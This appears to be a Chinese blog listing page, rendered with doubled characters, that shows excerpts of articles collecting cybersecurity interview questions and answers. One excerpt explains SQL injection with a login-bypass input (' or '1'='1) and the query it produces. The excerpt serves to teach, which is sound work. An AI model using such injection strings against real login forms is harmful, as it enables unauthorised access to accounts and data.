    隨著國家政策的扶持,網(wǎng)絡(luò)安全行業(yè)也越來越為大眾所熟知,相應(yīng)的想要進(jìn)入到網(wǎng)絡(luò)安全行業(yè)的人也越來越多,為了拿到心儀的Offer之外,除了學(xué)好網(wǎng)絡(luò)安全知識以外,還要應(yīng)對好企業(yè)的面試。 所以在這里我歸納總結(jié)了一些網(wǎng)絡(luò)安全方面的常見面試題,希望能對大家有所幫助

    2023年04月09日
    瀏覽(30)
  • 網(wǎng)絡(luò)安全面試題整理——甲方類(含答案解析)

    網(wǎng)絡(luò)安全面試題整理——甲方類(含答案解析)

    以下是對目前部分熱門的甲方面試/筆試題(偏管理和運(yùn)營)的總結(jié)和思考,希望可以幫助到正在準(zhǔn)備甲方面試的你們; 愿我們披荊斬棘,享受前進(jìn)路上的每一處風(fēng)景 1. 簡述一下目前主流編程語言的相關(guān)漏洞 答:這個(gè)題的相關(guān)思路就是聊一聊目前主流語言的漏洞,你可以從兩

    2024年02月08日
    瀏覽(18)
  • 2023最新網(wǎng)絡(luò)安全面試題大全,看完這篇你的秋招offer就到手了!

    2023最新網(wǎng)絡(luò)安全面試題大全,看完這篇你的秋招offer就到手了!

    隨著國家政策的扶持,網(wǎng)絡(luò)安全行業(yè)也越來越為大眾所熟知,想要進(jìn)入到網(wǎng)絡(luò)安全行業(yè)的人也越來越多。 為了拿到心儀的 Offer 之外,除了學(xué)好網(wǎng)絡(luò)安全知識以外,還要應(yīng)對好企業(yè)的面試。 作為一個(gè)安全老鳥,工作這么多年,面試過很多人也出過很多面試題目,也在網(wǎng)上收集

    2024年02月07日
    瀏覽(30)
  • 網(wǎng)絡(luò)安全書籍推薦+網(wǎng)絡(luò)安全面試題合集

    網(wǎng)絡(luò)安全書籍推薦+網(wǎng)絡(luò)安全面試題合集

    一、計(jì)算機(jī)基礎(chǔ) 《深入理解計(jì)算機(jī)系統(tǒng)》 《鳥哥的Linux私房菜》 《TCP/IP詳解(卷1:協(xié)議)》 《HTTP權(quán)威指南》 《Wireshark數(shù)據(jù)包分析實(shí)戰(zhàn)》 《Wireshark網(wǎng)絡(luò)分析的藝術(shù)》 《Wireshark網(wǎng)絡(luò)分析就這么簡單》 二、網(wǎng)絡(luò)滲透 《白帽子講Web安全》 《Web安全深度剖析》 《SQL注入天書》

    2023年04月25日
    瀏覽(27)
  • 史上最全網(wǎng)絡(luò)安全面試題+答案

    1、什么是SQL注入攻擊 前端代碼未被解析被代入到數(shù)據(jù)庫導(dǎo)致數(shù)據(jù)庫報(bào)錯(cuò) 2、什么是XSS攻擊 跨站腳本攻擊 在網(wǎng)頁中嵌入客戶端惡意腳本,常用s語言,也會(huì)用其他腳本語言 屬于客戶端攻擊,受害者是用戶,網(wǎng)站管理員也屬于用戶,攻擊者一般也是靠管理員身份作為跳板 3、什么

    2024年02月13日
    瀏覽(31)
  • 500道網(wǎng)絡(luò)安全面試題集錦(附答案)

    500道網(wǎng)絡(luò)安全面試題集錦(附答案)

    本篇文章內(nèi)容為網(wǎng)絡(luò)安全各個(gè)方向涉及的面試題,但是無論如何都無法覆蓋所有的面試問題,更多的還是希望由點(diǎn)達(dá)面,查漏補(bǔ)缺,然后祝各位前程似錦,都能找到自己滿意的工作! ? 攻擊者通過在web界面中嵌入惡意腳本(通常為js代碼),造成用戶在瀏覽網(wǎng)頁時(shí),控制用戶

    2024年02月15日
    瀏覽(26)
  • 網(wǎng)絡(luò)安全面試題大全(整理版)300+面試題附答案詳解,最全面詳細(xì)

    網(wǎng)絡(luò)安全面試題大全(整理版)300+面試題附答案詳解,最全面詳細(xì)

    隨著國家政策的扶持,網(wǎng)絡(luò)安全行業(yè)也越來越為大眾所熟知,想要進(jìn)入到網(wǎng)絡(luò)安全行業(yè)的人也越來越多。 為了拿到心儀的Offer之外,除了學(xué)好網(wǎng)絡(luò)安全知識以外,還要應(yīng)對好企業(yè)的面試。 作為一個(gè)安全老鳥,工作這么多年,面試過很多人也出過很多面試題目,也在網(wǎng)上收集了

    2024年02月08日
    瀏覽(28)
  • 【面試】面試官問的幾率較大的網(wǎng)絡(luò)安全面試題

    【面試】面試官問的幾率較大的網(wǎng)絡(luò)安全面試題

    攻擊者在HTTP請求中注入惡意的SQL代碼,服務(wù)器使用參數(shù)構(gòu)建數(shù)據(jù)庫SQL命令時(shí),惡意SQL被一起構(gòu)造,并在數(shù)據(jù)庫中執(zhí)行。 用戶登錄,輸入用戶名 lianggzone,密碼 ‘ or ‘1’=’1 ,如果此時(shí)使用參數(shù)構(gòu)造的方式,就會(huì)出現(xiàn) select * from user where name = ‘lianggzone’ and password = ‘’ or

    2024年02月01日
    瀏覽(23)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包